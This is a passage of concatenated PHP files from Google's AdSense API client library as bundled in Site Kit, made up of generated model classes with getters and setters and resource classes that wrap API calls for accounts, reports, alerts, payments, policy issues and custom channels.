http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class ListLinkedCustomChannelsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customChannels'; protected $customChannelsType = \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class; protected $customChannelsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param CustomChannel[] */ public function setCustomChannels($customChannels) { $this->customChannels = $customChannels; } /** * @return CustomChannel[] */ public function getCustomChannels() { return $this->customChannels; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedCustomChannelsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_ListLinkedCustomChannelsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Site extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $autoAdsEnabled; /** * @var string */ public $domain; /** * @var string */ public $name; /** * @var string */ public $reportingDimensionId; /** * @var string */ public $state; /** * @param bool */ public function setAutoAdsEnabled($autoAdsEnabled) { $this->autoAdsEnabled = $autoAdsEnabled; } /** * @return bool */ public function getAutoAdsEnabled() { return $this->autoAdsEnabled; } /** * @param string */ public function setDomain($domain) { $this->domain = $domain; } /** * @return string */ public function getDomain() { return $this->domain; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setReportingDimensionId($reportingDimensionId) { $this->reportingDimensionId = $reportingDimensionId; } /** * @return string */ public function getReportingDimensionId() { return $this->reportingDimensionId; } /** * @param string */ public function setState($state) { $this->state = $state; } /** * @return string */ public function getState() { return $this->state; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Site::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Site'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense; class Alert extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $message; /** * @var string */ public $name; /** * @var string */ public $severity; /** * @var string */ public $type; /** * @param string */ public function setMessage($message) { $this->message = $message; } /** * @return string */ public function getMessage() { return $this->message; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } /** * @param string */ public function setSeverity($severity) { $this->severity = $severity; } /** * @return string */ public function getSeverity() { return $this->severity; } /** * @param string */ public function setType($type) { $this->type = $type; } /** * @return string */ public function getType() { return $this->type; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Alert::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Alert'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\HttpBody; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSavedReportsResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ReportResult; /** * The "saved" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $saved = $adsenseService->accounts_reports_saved; * </code> */ class AccountsReportsSaved extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Generates a saved report. (saved.generate) * * @param string $name Required. Name of the saved report. Format: * accounts/{account}/reports/{report} * @param array $optParams Optional parameters. * * @opt_param string currencyCode The [ISO-4217 currency * code](https://en.wikipedia.org/wiki/ISO_4217) to use when reporting on * monetary metrics. Defaults to the account's currency if not set. * @opt_param string dateRange Date range of the report, if unset the range will * be considered CUSTOM. * @opt_param int endDate.day Day of a month. Must be from 1 to 31 and valid for * the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int endDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int endDate.year Year of the date. Must be from 1 to 9999, or 0 to * specify a date without a year. * @opt_param string languageCode The language to use for translating report * output. If unspecified, this defaults to English ("en"). If the given * language is not supported, report output will be returned in English. The * language is specified as an [IETF BCP-47 language * code](https://en.wikipedia.org/wiki/IETF_language_tag). * @opt_param string reportingTimeZone Timezone in which to generate the report. * If unspecified, this defaults to the account timezone. For more information, * see [changing the time zone of your * reports](https://support.google.com/adsense/answer/9830725). * @opt_param int startDate.day Day of a month. Must be from 1 to 31 and valid * for the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int startDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int startDate.year Year of the date. Must be from 1 to 9999, or 0 * to specify a date without a year. * @return ReportResult * @throws \Google\Service\Exception */ public function generate($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('generate', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ReportResult::class); } /** * Generates a csv formatted saved report. (saved.generateCsv) * * @param string $name Required. Name of the saved report. Format: * accounts/{account}/reports/{report} * @param array $optParams Optional parameters. * * @opt_param string currencyCode The [ISO-4217 currency * code](https://en.wikipedia.org/wiki/ISO_4217) to use when reporting on * monetary metrics. Defaults to the account's currency if not set. * @opt_param string dateRange Date range of the report, if unset the range will * be considered CUSTOM. * @opt_param int endDate.day Day of a month. Must be from 1 to 31 and valid for * the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int endDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int endDate.year Year of the date. Must be from 1 to 9999, or 0 to * specify a date without a year. * @opt_param string languageCode The language to use for translating report * output. If unspecified, this defaults to English ("en"). If the given * language is not supported, report output will be returned in English. The * language is specified as an [IETF BCP-47 language * code](https://en.wikipedia.org/wiki/IETF_language_tag). * @opt_param string reportingTimeZone Timezone in which to generate the report. * If unspecified, this defaults to the account timezone. For more information, * see [changing the time zone of your * reports](https://support.google.com/adsense/answer/9830725). * @opt_param int startDate.day Day of a month. Must be from 1 to 31 and valid * for the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int startDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int startDate.year Year of the date. Must be from 1 to 9999, or 0 * to specify a date without a year. * @return HttpBody * @throws \Google\Service\Exception */ public function generateCsv($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('generateCsv', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\HttpBody::class); } /** * Lists saved reports. (saved.listAccountsReportsSaved) * * @param string $parent Required. The account which owns the collection of * reports. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of reports to include in the * response, used for paging. If unspecified, at most 10000 reports will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListSavedReports` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListSavedReports` must match * the call that provided the page token. * @return ListSavedReportsResponse * @throws \Google\Service\Exception */ public function listAccountsReportsSaved($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListSavedReportsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsReportsSaved::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsReportsSaved'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPolicyIssuesResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyIssue; /** * The "policyIssues" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $policyIssues = $adsenseService->accounts_policyIssues; * </code> */ class AccountsPolicyIssues extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets information about the selected policy issue. (policyIssues.get) * * @param string $name Required. Name of the policy issue. Format: * accounts/{account}/policyIssues/{policy_issue} * @param array $optParams Optional parameters. * @return PolicyIssue * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\PolicyIssue::class); } /** * Lists all the policy issues for the specified account. * (policyIssues.listAccountsPolicyIssues) * * @param string $parent Required. The account for which policy issues are being * retrieved. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of policy issues to include in the * response, used for paging. If unspecified, at most 10000 policy issues will * be returned. The maximum value is 10000; values above 10000 will be coerced * to 10000. * @opt_param string pageToken A page token, received from a previous * `ListPolicyIssues` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListPolicyIssues` must match * the call that provided the page token. * @return ListPolicyIssuesResponse * @throws \Google\Service\Exception */ public function listAccountsPolicyIssues($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPolicyIssuesResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsPolicyIssues::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsPolicyIssues'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPaymentsResponse; /** * The "payments" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $payments = $adsenseService->accounts_payments; * </code> */ class AccountsPayments extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Lists all the payments available for an account. * (payments.listAccountsPayments) * * @param string $parent Required. The account which owns the collection of * payments. Format: accounts/{account} * @param array $optParams Optional parameters. * @return ListPaymentsResponse * @throws \Google\Service\Exception */ public function listAccountsPayments($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListPaymentsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsPayments::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsPayments'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdsenseEmpty; use Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListCustomChannelsResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedAdUnitsResponse; /** * The "customchannels" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $customchannels = $adsenseService->accounts_adclients_customchannels; * </code> */ class AccountsAdclientsCustomchannels extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a custom channel. This method can be called only by a restricted set * of projects, which are usually owned by [AdSense for * Platforms](https://developers.google.com/adsense/platforms/) publishers. * Contact your account manager if you need to use this method. * (customchannels.create) * * @param string $parent Required. The ad client to create a custom channel * under. Format: accounts/{account}/adclients/{adclient} * @param CustomChannel $postBody * @param array $optParams Optional parameters. * @return CustomChannel * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class); } /** * Deletes a custom channel. This method can be called only by a restricted set * of projects, which are usually owned by [AdSense for * Platforms](https://developers.google.com/adsense/platforms/) publishers. * Contact your account manager if you need to use this method. * (customchannels.delete) * * @param string $name Required. Name of the custom channel to delete. Format: * accounts/{account}/adclients/{adclient}/customchannels/{customchannel} * @param array $optParams Optional parameters. * @return AdsenseEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdsenseEmpty::class); } /** * Gets information about the selected custom channel. (customchannels.get) * * @param string $name Required. Name of the custom channel. Format: * accounts/{account}/adclients/{adclient}/customchannels/{customchannel} * @param array $optParams Optional parameters. * @return CustomChannel * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class); } /** * Lists all the custom channels available in an ad client. * (customchannels.listAccountsAdclientsCustomchannels) * * @param string $parent Required. The ad client which owns the collection of * custom channels. Format: accounts/{account}/adclients/{adclient} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of custom channels to include in * the response, used for paging. If unspecified, at most 10000 custom channels * will be returned. The maximum value is 10000; values above 10000 will be * coerced to 10000. * @opt_param string pageToken A page token, received from a previous * `ListCustomChannels` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListCustomChannels` must match * the call that provided the page token. * @return ListCustomChannelsResponse * @throws \Google\Service\Exception */ public function listAccountsAdclientsCustomchannels($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListCustomChannelsResponse::class); } /** * Lists all the ad units available for a custom channel. * (customchannels.listLinkedAdUnits) * * @param string $parent Required. The custom channel which owns the collection * of ad units. Format: * accounts/{account}/adclients/{adclient}/customchannels/{customchannel} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of ad units to include in the * response, used for paging. If unspecified, at most 10000 ad units will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListLinkedAdUnits` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListLinkedAdUnits` must match * the call that provided the page token. * @return ListLinkedAdUnitsResponse * @throws \Google\Service\Exception */ public function listLinkedAdUnits($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('listLinkedAdUnits', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListLinkedAdUnitsResponse::class); } /** * Updates a custom channel. This method can be called only by a restricted set * of projects, which are usually owned by [AdSense for * Platforms](https://developers.google.com/adsense/platforms/) publishers. * Contact your account manager if you need to use this method. * (customchannels.patch) * * @param string $name Output only. Resource name of the custom channel. Format: * accounts/{account}/adclients/{adclient}/customchannels/{customchannel} * @param CustomChannel $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask The list of fields to update. If empty, a full * update is performed. * @return CustomChannel * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\CustomChannel::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAdclientsCustomchannels::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsAdclientsCustomchannels'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAlertsResponse; /** * The "alerts" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $alerts = $adsenseService->accounts_alerts; * </code> */ class AccountsAlerts extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Lists all the alerts available in an account. (alerts.listAccountsAlerts) * * @param string $parent Required. The account which owns the collection of * alerts. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param string languageCode The language to use for translating alert * messages. If unspecified, this defaults to the user's display language. If * the given language is not supported, alerts will be returned in English. The * language is specified as an [IETF BCP-47 language * code](https://en.wikipedia.org/wiki/IETF_language_tag). * @return ListAlertsResponse * @throws \Google\Service\Exception */ public function listAccountsAlerts($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAlertsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsAlerts::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsAlerts'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\Account; use Google\Site_Kit_Dependencies\Google\Service\Adsense\AdBlockingRecoveryTag; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAccountsResponse; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ListChildAccountsResponse; /** * The "accounts" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $accounts = $adsenseService->accounts; * </code> */ class Accounts extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Gets information about the selected AdSense account. (accounts.get) * * @param string $name Required. Account to get information about. Format: * accounts/{account} * @param array $optParams Optional parameters. * @return Account * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\Account::class); } /** * Gets the ad blocking recovery tag of an account. * (accounts.getAdBlockingRecoveryTag) * * @param string $name Required. The name of the account to get the tag for. * Format: accounts/{account} * @param array $optParams Optional parameters. * @return AdBlockingRecoveryTag * @throws \Google\Service\Exception */ public function getAdBlockingRecoveryTag($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getAdBlockingRecoveryTag', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\AdBlockingRecoveryTag::class); } /** * Lists all accounts available to this user. (accounts.listAccounts) * * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of accounts to include in the * response, used for paging. If unspecified, at most 10000 accounts will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListAccounts` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListAccounts` must match the * call that provided the page token. * @return ListAccountsResponse * @throws \Google\Service\Exception */ public function listAccounts($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListAccountsResponse::class); } /** * Lists all accounts directly managed by the given AdSense account. * (accounts.listChildAccounts) * * @param string $parent Required. The parent account, which owns the child * accounts. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of accounts to include in the * response, used for paging. If unspecified, at most 10000 accounts will be * returned. The maximum value is 10000; values above 10000 will be coerced to * 10000. * @opt_param string pageToken A page token, received from a previous * `ListChildAccounts` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListChildAccounts` must match * the call that provided the page token. * @return ListChildAccountsResponse * @throws \Google\Service\Exception */ public function listChildAccounts($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('listChildAccounts', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ListChildAccountsResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\Accounts::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_Accounts'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource; use Google\Site_Kit_Dependencies\Google\Service\Adsense\HttpBody; use Google\Site_Kit_Dependencies\Google\Service\Adsense\ReportResult; use Google\Site_Kit_Dependencies\Google\Service\Adsense\SavedReport; /** * The "reports" collection of methods. * Typical usage is: * <code> * $adsenseService = new Google\Service\Adsense(...); * $reports = $adsenseService->accounts_reports; * </code> */ class AccountsReports extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Generates an ad hoc report. (reports.generate) * * @param string $account Required. The account which owns the collection of * reports. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param string currencyCode The [ISO-4217 currency * code](https://en.wikipedia.org/wiki/ISO_4217) to use when reporting on * monetary metrics. Defaults to the account's currency if not set. * @opt_param string dateRange Date range of the report, if unset the range will * be considered CUSTOM. * @opt_param string dimensions Dimensions to base the report on. * @opt_param int endDate.day Day of a month. Must be from 1 to 31 and valid for * the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int endDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int endDate.year Year of the date. Must be from 1 to 9999, or 0 to * specify a date without a year. * @opt_param string filters A list of * [filters](/adsense/management/reporting/filtering) to apply to the report. * All provided filters must match in order for the data to be included in the * report. * @opt_param string languageCode The language to use for translating report * output. If unspecified, this defaults to English ("en"). If the given * language is not supported, report output will be returned in English. The * language is specified as an [IETF BCP-47 language * code](https://en.wikipedia.org/wiki/IETF_language_tag). * @opt_param int limit The maximum number of rows of report data to return. * Reports producing more rows than the requested limit will be truncated. If * unset, this defaults to 100,000 rows for `Reports.GenerateReport` and * 1,000,000 rows for `Reports.GenerateCsvReport`, which are also the maximum * values permitted here. Report truncation can be identified (for * `Reports.GenerateReport` only) by comparing the number of rows returned to * the value returned in `total_matched_rows`. * @opt_param string metrics Required. Reporting metrics. * @opt_param string orderBy The name of a dimension or metric to sort the * resulting report on, can be prefixed with "+" to sort ascending or "-" to * sort descending. If no prefix is specified, the column is sorted ascending. * @opt_param string reportingTimeZone Timezone in which to generate the report. * If unspecified, this defaults to the account timezone. For more information, * see [changing the time zone of your * reports](https://support.google.com/adsense/answer/9830725). * @opt_param int startDate.day Day of a month. Must be from 1 to 31 and valid * for the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int startDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int startDate.year Year of the date. Must be from 1 to 9999, or 0 * to specify a date without a year. * @return ReportResult * @throws \Google\Service\Exception */ public function generate($account, $optParams = []) { $params = ['account' => $account]; $params = \array_merge($params, $optParams); return $this->call('generate', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\ReportResult::class); } /** * Generates a csv formatted ad hoc report. (reports.generateCsv) * * @param string $account Required. The account which owns the collection of * reports. Format: accounts/{account} * @param array $optParams Optional parameters. * * @opt_param string currencyCode The [ISO-4217 currency * code](https://en.wikipedia.org/wiki/ISO_4217) to use when reporting on * monetary metrics. Defaults to the account's currency if not set. * @opt_param string dateRange Date range of the report, if unset the range will * be considered CUSTOM. * @opt_param string dimensions Dimensions to base the report on. * @opt_param int endDate.day Day of a month. Must be from 1 to 31 and valid for * the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int endDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int endDate.year Year of the date. Must be from 1 to 9999, or 0 to * specify a date without a year. * @opt_param string filters A list of * [filters](/adsense/management/reporting/filtering) to apply to the report. * All provided filters must match in order for the data to be included in the * report. * @opt_param string languageCode The language to use for translating report * output. If unspecified, this defaults to English ("en"). If the given * language is not supported, report output will be returned in English. The * language is specified as an [IETF BCP-47 language * code](https://en.wikipedia.org/wiki/IETF_language_tag). * @opt_param int limit The maximum number of rows of report data to return. * Reports producing more rows than the requested limit will be truncated. If * unset, this defaults to 100,000 rows for `Reports.GenerateReport` and * 1,000,000 rows for `Reports.GenerateCsvReport`, which are also the maximum * values permitted here. Report truncation can be identified (for * `Reports.GenerateReport` only) by comparing the number of rows returned to * the value returned in `total_matched_rows`. * @opt_param string metrics Required. Reporting metrics. * @opt_param string orderBy The name of a dimension or metric to sort the * resulting report on, can be prefixed with "+" to sort ascending or "-" to * sort descending. If no prefix is specified, the column is sorted ascending. * @opt_param string reportingTimeZone Timezone in which to generate the report. * If unspecified, this defaults to the account timezone. For more information, * see [changing the time zone of your * reports](https://support.google.com/adsense/answer/9830725). * @opt_param int startDate.day Day of a month. Must be from 1 to 31 and valid * for the year and month, or 0 to specify a year by itself or a year and month * where the day isn't significant. * @opt_param int startDate.month Month of a year. Must be from 1 to 12, or 0 to * specify a year without a month and day. * @opt_param int startDate.year Year of the date. Must be from 1 to 9999, or 0 * to specify a date without a year. * @return HttpBody * @throws \Google\Service\Exception */ public function generateCsv($account, $optParams = []) { $params = ['account' => $account]; $params = \array_merge($params, $optParams); return $this->call('generateCsv', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\HttpBody::class); } /** * Gets the saved report from the given resource name. (reports.getSaved) * * @param string $name Required. The name of the saved report to retrieve. * Format: accounts/{account}/reports/{report} * @param array $optParams Optional parameters. * @return SavedReport * @throws \Google\Service\Exception */ public function getSaved($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('getSaved', [$params], \Google\Site_Kit_Dependencies\Google\Service\Adsense\SavedReport::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\Adsense\Resource\AccountsReports::class, 'Google\\Site_Kit_Dependencies\\Google_Service_Adsense_Resource_AccountsReports'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, 